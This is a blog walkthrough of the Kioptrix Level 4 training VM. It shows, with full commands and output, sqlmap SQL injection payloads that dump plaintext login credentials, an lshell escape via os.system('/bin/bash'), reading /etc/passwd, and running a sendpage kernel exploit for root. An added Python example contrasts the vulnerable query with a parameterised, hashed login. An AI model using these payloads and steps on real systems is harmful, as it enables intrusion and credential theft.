Friday, May 22, 2015

Kioptrix Level 4 Walkthrough


This is the first in a long series of Vulnerable Virtual Machine Walkthroughs that I'll be posting to this site. By looking at the date of my last post, one would assume that I've gone dormant, but that's definitely not the case. So without further ado, I bring you Kioptrix Level 4.

Enumeration

root@kali:~# nmap 10.1.1.10
Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-21 09:05 EDT
Nmap scan report for 10.1.1.10
Host is up (0.00032s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:C2:50:41 (Cadmus Computer Systems)


Nmap done: 19 IP addresses (3 hosts up) scanned in 9.10 seconds
root@kali:~#


Visiting the webpage on port 80 revealed a login page which may be vulnerable to SQL injection.

Using a bunch of the usual combinations, I was able to provoke the site into revealing the underlying DBMS (MySQL). With this information I was able to specify the DBMS in my sqlmap invocation. Sqlmap output:

root@kali:~# sqlmap -u "http://10.1.1.10/checklogin.php" --dbms=MySQL --level=5 --risk=3 --data="myusername=admin&mypassword=test" --dump
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:14:03

[09:14:03] [INFO] testing connection to the target URL
[09:14:04] [INFO] heuristics detected web page charset 'ascii'
[09:14:04] [INFO] testing if the target URL is stable. This can take a couple of seconds
[09:14:05] [INFO] target URL is stable
[09:14:05] [INFO] testing if POST parameter 'myusername' is dynamic
[09:14:05] [WARNING] POST parameter 'myusername' does not appear dynamic
[09:14:05] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
[09:14:05] [INFO] testing for SQL injection on POST parameter 'myusername'
[09:14:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[09:14:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[09:14:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:14:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[09:14:09] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[09:14:10] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[09:14:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[09:14:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[09:14:10] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[09:14:10] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[09:14:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[09:14:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[09:14:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[09:14:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[09:14:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[09:14:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[09:14:11] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[09:14:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[09:14:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
Blah, blah, blah... ultimately revealing usernames and passwords within the underlying database:
Place: POST
Parameter: mypassword
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-4827' OR (7207=7207) AND 'wyxA'='wyxA

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: myusername=admin&mypassword=test' AND 8831=BENCHMARK(5000000,MD5(0x46556262)) AND 'KxNZ'='KxNZ
---
[09:16:14] [INFO] testing MySQL
[09:16:14] [INFO] confirming MySQL
[09:16:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[09:16:14] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:16:14] [INFO] fetching current database
[09:16:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:16:14] [INFO] retrieved: members
[09:16:15] [INFO] fetching tables for database: 'members'
[09:16:15] [INFO] fetching number of tables for database 'members'
[09:16:15] [INFO] retrieved: 1
[09:16:15] [INFO] retrieved: members
[09:16:15] [INFO] fetching columns for table 'members' in database 'members'
[09:16:15] [INFO] retrieved: 3
[09:16:15] [INFO] retrieved: id
[09:16:16] [INFO] retrieved: username
[09:16:16] [INFO] retrieved: password
[09:16:17] [INFO] fetching entries for table 'members' in database 'members'
[09:16:17] [INFO] fetching number of entries for table 'members' in database 'members'
[09:16:17] [INFO] retrieved: 2
[09:16:17] [INFO] retrieved: 1
[09:16:17] [INFO] retrieved: MyNameIsJohn
[09:16:18] [INFO] retrieved: john
[09:16:18] [INFO] retrieved: 2
[09:16:19] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[09:16:20] [INFO] retrieved: robert
[09:16:21] [INFO] analyzing table dump for possible password hashes
Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+

[09:16:21] [INFO] table 'members.members' dumped to CSV file '/usr/share/sqlmap/output/10.1.1.10/dump/members/members.csv'
[09:16:21] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/10.1.1.10'

[*] shutting down at 09:16:21

root@kali:~#
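To show why the boolean-based payload above gets sqlmap past the login, and what closes the hole, here is an added example (my own code, not the VM's checklogin.php): a login check modelled on the members table, using an in-memory SQLite database in place of MySQL and a salted PBKDF2 hash in place of the plaintext passwords seen in the dump. Robert's real password is not in the dump, so a placeholder is used.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed stand-in for the 'members' table in the sqlmap dump. SQLite
# replaces MySQL so the example runs offline; robert's password is a placeholder.
SEED = [("john", "MyNameIsJohn"), ("robert", "placeholder-password")]
PAYLOAD = "-4827' OR (7207=7207) AND 'wyxA'='wyxA"  # sqlmap's boolean-based payload


def _kdf(password: str, salt: bytes) -> bytes:
    # PBKDF2-HMAC-SHA256: a slow, salted hash instead of a plaintext column.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT,"
                 " password TEXT, salt BLOB, pw_hash BLOB)")
    for user, pw in SEED:
        salt = os.urandom(16)
        conn.execute("INSERT INTO members (username, password, salt, pw_hash)"
                     " VALUES (?, ?, ?, ?)", (user, pw, salt, _kdf(pw, salt)))
    return conn


def vulnerable_login(conn, username: str, password: str):
    # The checklogin.php pattern: user input spliced straight into the SQL.
    # AND binds tighter than OR, so the payload's OR branch is true for every row.
    sql = (f"SELECT username FROM members WHERE username='{username}'"
           f" AND password='{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn, username: str, password: str):
    # Parameterised lookup: the payload is just a string that matches no user.
    # The stored hash is then checked with a constant-time comparison.
    row = conn.execute("SELECT username, salt, pw_hash FROM members"
                       " WHERE username = ?", (username,)).fetchone()
    if row is None:
        return None
    user, salt, pw_hash = row
    return user if hmac.compare_digest(_kdf(password, salt), pw_hash) else None


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", vulnerable_login(db, "admin", PAYLOAD))  # a row: bypassed
    print("safe:", safe_login(db, "admin", PAYLOAD))              # None
    print("safe, real creds:", safe_login(db, "john", "MyNameIsJohn"))
```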


Now let's attempt to SSH in with john's credentials:

root@kali:~# ssh john@10.1.1.10
The authenticity of host '10.1.1.10 (10.1.1.10)' can't be established.
RSA key fingerprint is 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.1.10' (RSA) to the list of known hosts.
john@10.1.1.10's password:
Connection closed by 10.1.1.10
root@kali:~# ssh john@10.1.1.10
john@10.1.1.10's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls

Awesome, the credentials worked, but now we're trapped in a stupid shell... how do we escape?

Research on how to escape this shell led me to the following webpage:

http://www.aldeid.com/wiki/Lshell

Worked like a charm!

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$


john@Kioptrix4:~$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

Now it's time to take a look around and escalate privileges. It looks like this Linux kernel is vulnerable to some of the old favorites.

john@Kioptrix4:~$ cat /etc/sudoers
cat: /etc/sudoers: Permission denied
john@Kioptrix4:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
john@Kioptrix4:~$ pwd
/home/john
john@Kioptrix4:~$ ls
john@Kioptrix4:~$ cd ..
john@Kioptrix4:/home$ ls
john  loneferret  robert
john@Kioptrix4:/home$ cd loneferret
john@Kioptrix4:/home/loneferret$ ls
john@Kioptrix4:/home/loneferret$ ls -al
total 44
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .
drwxr-xr-x 5 root       root       4096 2012-02-04 18:05 ..
-rw------- 1 loneferret loneferret   62 2012-02-06 20:24 .bash_history
-rw-r--r-- 1 loneferret loneferret  220 2012-02-04 09:58 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc
-rw-r--r-- 1 loneferret loneferret    1 2012-02-05 10:37 .lhistory
-rw------- 1 root       root         68 2012-02-04 10:05 .my.cnf.5086
-rw------- 1 root       root          1 2012-02-04 10:05 .mysql.5086
-rw------- 1 loneferret loneferret    1 2012-02-05 10:38 .mysql_history
-rw------- 1 loneferret loneferret    9 2012-02-06 16:39 .nano_history
-rw-r--r-- 1 loneferret loneferret  586 2012-02-04 09:58 .profile
-rw-r--r-- 1 loneferret loneferret    0 2012-02-04 10:01 .sudo_as_admin_successful
john@Kioptrix4:/home/loneferret$ more .sudo_as_admin_successful
john@Kioptrix4:/home/loneferret$ more .bash_history
.bash_history: Permission denied

As you can see, I came across lots of interesting things, including MySQL and nice stuff in user directories, but it was my old faithful Linux sendpage exploit that brought home the bacon.


john@Kioptrix4:~$ ./sendpage
#